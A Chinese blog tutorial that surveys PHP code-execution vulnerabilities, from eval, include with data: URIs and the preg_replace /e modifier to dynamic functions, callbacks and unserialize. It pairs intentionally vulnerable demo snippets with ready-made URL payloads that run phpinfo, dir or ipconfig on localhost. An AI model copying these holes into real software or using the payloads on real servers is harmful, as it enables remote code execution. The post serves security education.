php定时执行代码漏洞_常见的PHP代码执行漏洞

最新推荐文章于 2025-03-26 20:19:36 发布
原创 最新推荐文章于 2025-03-26 20:19:36 发布
· 285 阅读 · 0 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php定时执行代码漏洞

本文详细介绍了PHP代码执行漏洞的多种方式,包括:1) 使用eval()、assert()等函数的代码执行;2) 文件包含函数引起的代码注射,如include();3) 正则匹配中的代码注射,特别是preg_replace()函数;4) 动态代码执行,如动态变量和函数;5) 其他可能导致代码执行的函数,如ob_start()和array_map()。通过代码示例展示了如何利用这些漏洞并防范。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 代码执行函数

PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等

demo code 1.1:

echo `dir`;

?>

2. 文件包含代码注射

文件包含函数在特定条件下的代码注射,如include()、include_once()、 require()、require_once()。

当allow_url_include=On ,PHP Version>=5.2.0 时,导致代码注射。

demo code 2.1:

include($_GET[''a'']);

?>

访问http://localhost/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E 即

执行phpinfo()。

3. 正则匹配代码注射

众所周知的preg_replace()函数导致的代码注射。当pattern中存在/e模式修饰符,即允许执行代码。这里我们分三种情况讨论下

3.1 preg_replace() pattern 参数注射

pattern即第一个参数的代码注射。

当magic_quotes_gpc=Off时,导致代码执行。

demo code 3.1:

echo $regexp = $_GET[''reg''];

$var = ''phpinfo()'';

preg_replace("/(.*?)$regexp", ''\\1'', $var);

?>

访问http://localhost/preg_replace1.php?reg=%3C\/php%3E/e 即

执行phpinfo()。

3.2 preg_replace() replacement参数注射

replacement即第二个参数的代码注射,导致代码执行。

demo code 3.2:

preg_replace("/menzhi007/e",$_GET[''h''],"jutst test menzhi007!");

?>

当我们提交 http://localhost/preg_replace2.php?h=phpinfo() 即

执行phpinfo()。

3.3 preg_replace()第三个参数注射

我们通过构造subject参数执行代码。提交:http://localhost/preg_replace3.php?h=[php]phpinfo()[/php]

或者 http://localhost/preg_replace3.php?h=[php]${phpinfo%28%29}[/php] 导致代码执行

demo code 3.3:

preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $_GET[''h'']);

?>

四 动态代码执行

4.1 动态变量代码执行

demo code 4.1:

$dyn_func = $_GET[''dyn_func''];

$argument = $_GET[''argument''];

$dyn_func($argument);

?>

我们提交 http://localhost/dyn_func.php?dy ... p;argument=ipconfig 执行ipconfig命令

4.2 动态函数代码执行

demo code 4.2:

$foobar = $_GET[''foobar''];

$dyn_func = create_function(''$foobar'', "echo $foobar;");

$dyn_func('''');

?>

我们提交 http://localhost/create_function.php?foobar=system%28dir%29 执行dir命令

五 其他

5.1 ob_start()函数的代码执行

demo code 5.1:

$foobar = ''system'';

ob_start($foobar);

echo ''dir'';

ob_end_flush();

?>

5.2 array_map()函数的代码执行

demo code 5.2:

$evil_callback = $_GET[''callback''];

$some_array = array(0, 1, 2, 3);

$new_array = array_map($evil_callback, $some_array);

?>

我们提交 http://localhost/array_map.php?callback=phpinfo 即执行phpinfo()。

5.3 unserialize()与eval()

unserialize()是PHP中使用率非常高的函数。不正当使用unserialize()容易导致安全隐患。

(黑哥那个挑战2 http://hi.baidu.com/hi_heige/blo ... 5b18f499250a9b.html)

demo code 5.3:

class Example {

var $var = '''';

function __destruct() {

eval($this->var);

}

}

unserialize($_GET[''saved_code'']);

?>

我们提交 http://localhost/unserialize.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;} 即执行phpinfo()。

5.4 容易导致安全问题的函数

同类型函数还有很多

array_map()

usort(), uasort(), uksort()

array_filter()

array_reduce()

array_diff_uassoc(), array_diff_ukey()

array_udiff(), array_udiff_assoc(), array_udiff_uassoc()

array_intersect_assoc(), array_intersect_uassoc()

array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()

array_walk(), array_walk_recursive()

xml_set_character_data_handler()

xml_set_default_handler()

xml_set_element_handler()

xml_set_end_namespace_decl_handler()

xml_set_external_entity_ref_handler()

xml_set_notation_decl_handler()

xml_set_processing_instruction_handler()

xml_set_start_namespace_decl_handler()

xml_set_unparsed_entity_decl_handler()

stream_filter_register()

set_error_handler()

register_shutdown_function()

register_tick_function()

乔木 Leo
关注
PHP代码执行漏洞总结大全
LJW_IIE的博客
10-11 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
远程命令执行漏洞
2201_75572825的博客
08-14 1560
一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后后台会对该IP地址进行一次ping测试,并返回测试结果。E. cmd1&&cmd2:首先执行命令cmd1再执行命令cmd2,但是前提条件是命令cmd1执行正确才会执行命令cmd2,在cmd1执行失败的情况下不会执行cmd2命令。相反,如果cmd1命令执行不成功,就会执行cmd2命令。
php漏洞代码审计
anjuzi的专栏
06-06 653
在甲方公司做代码审计一般还是以白盒为主,漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露等。 1.xss + sql注入 其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注入的过滤。写个过滤函数,可由如下所示: $_REQUEST = filter_xss($_
PHP 代码执行漏洞:详细解析与绕过方法
最新发布
智商不在服务区的博客
03-26 1086
在 Web 安全中,PHP 代码执行漏洞是一类非常严重的安全隐患。攻击者利用这些漏洞不仅可以执行任意代码,还能进一步窃取敏感数据、植入后门,甚至控制整台服务器。尤其是在 CTF(Capture The Flag)比赛中,利用代码执行漏洞获取“flag”是常见的题目类型。通过以上示例可以看出,当过滤规则不够全面或过于依赖关键字屏蔽时,攻击者仍然可以利用字符拆分、特殊空白、数据流协议、以及内置变量等技巧绕过防护,实现代码执行或文件读取。避免动态执行用户输入:永远不要直接使用eval()
PHP常见漏洞的防范措施
大鹏
12-18 2177
一、常见PHP网站安全漏洞 对于PHP漏洞,目前常见漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。 1、session文件漏洞 Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用
wordpress php执行短代码_【漏洞通告】PHP远程代码执行漏洞(CVE-2019-11043)
weixin_39742568的博客
11-23 226
1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年9月26日,PHP官方发布漏洞通告,其中指出:使用 Nginx + php-fpm的服务器,在部分配置下,存在远程代码执行漏洞.且该配置已被广泛使用,危害较大,影响较为广泛。...
常见php 漏洞
热门推荐
国内某知名游戏公司小菜鸡工程师
11-19 1万+
关注漏洞,关注网络安全
浅谈PHP命令执行php文件需要注意的问题
10-20
在进行PHP开发和部署时,使用命令行执行PHP脚本是常见的操作,尤其是在进行定时任务调度、测试或后台处理时。但在执行过程中,需要注意以下几个关键的问题,以确保代码的安全性和稳定性: 1. 使用绝对路径。在文件...
WebShellKill_V1.2.9:PHP漏洞检测工具发布
3. **动态行为检测**:在服务器上运行PHP代码,检测其运行时行为是否异常,例如尝试检测是否执行了非法命令等。 4. **沙箱环境测试**:在一个隔离的环境中运行可疑脚本,观察其行为,以避免对真实服务器造成影响。 ...
CVE-2019-6339 Drupal 远程代码执行漏洞
m0_48520508的博客
01-15 907
0x00简介 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。Drupal是用作建设网站的。它是一个高度模块化,开源的web内容管理框架,它重点建立在合作之上的。它是一个可扩展的,适应标准的,并努力保持简洁代码和较小脚本的系统。Drupal 发布版中包含基本的核心功能,其他的额外功能可通过安装模块来获得。Drupal被设计为可被定制的,但是定制是通过覆写核心功能或者增加模块来完成的,而不是修改核心组件中的代码。它同样成功
PHP 反序列化漏洞
weixin_43801718的博客
10-23 1405
序列化与反序列化 在维基百科中是这样定义的: 序列化是(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换为可取用格式(例如存成文件,存于缓存,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。 概念其实很容易理解,就是将数据转换为一种可逆的存储格式,正向存储为序列化,反向存储就为反序列化。 按照王sir的理解,设想这样一种场景:在双十...
PHP 常见漏洞
04-13
PHP 常见漏洞
php代码执行漏洞
andiao1218的博客
12-02 143
php代码执行的两个函数eval(),assert() <?php $i = $_GET['x']; eval($i); ?> eval()函数将以php类型执行传入的参数x的值 给x传入一个phpinfo();,执行 给x传入一个php一句话代码,http://localhost/test/eval/eval.php?x=eval($_...
PHP代码执行漏洞
笑花大王
02-03 473
前言 最近的日子简简单单 早上起来健身+散打来一套 看看电视剧学习学习吃吃饭一天就结束了emmmm太快了一天 所以要更加努力!更加勤奋! PHP代码执行漏洞 有的应用程序中提供了一些可以将字符串作为代码执行的函数,例如PHP中的eval函数,可以将改函数的参数当做PHP代码来执行。如果对这些函数的参数控制不严格,就可能会被攻击者利用,执行恶意代码 1.eval函数 eval函数把...
PHP程序的常见漏洞攻击分析
weixin_30882895的博客
09-22 444
PHP程序也不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。 如何通过全局变量进行攻击? PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来...
php代码执行漏洞总结
weixin_44255856的博客
07-23 720
代码执行函数 PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等 <?php echo `dir`; ?> 二 文件包含代码注射 文件包含函数在特定条件下的代码注射,如include()、include_once()、 ...
php代码审计命令执行漏洞
h3110n3w0r1d
04-05 899
命令执行漏洞,用户通过浏览器在远程服务器上执行任意系统命令,严格意义上,与代码执行漏洞还是有一定的区别。 常用命令执行函数 exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引号` 实际上是使用shell_exec()函数 system() 输出并返回最后一行shell结果。 exec()...
php常见漏洞
qq_36232967的博客
06-20 609
此外,及时更新和修复依赖组件和框架也是保持应用程序安全的关键。会话劫持和固定:会话劫持是指攻击者窃取有效用户会话标识符,然后冒充合法用户访问系统。会话固定是指攻击者在不合法获取会话标识符的情况下,通过伪造会话标识符欺骗服务器信任他们。文件包含漏洞:文件包含漏洞出现在代码中使用用户可控参数来加载外部文件的情况下,攻击者可以通过构造恶意路径或文件名来加载任意文件并执行其中的代码,从而导致服务器被入侵。跨站脚本攻击(XSS):XSS 漏洞是指攻击者通过在网页中注入恶意脚本,从而在用户浏览器中执行恶意代码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值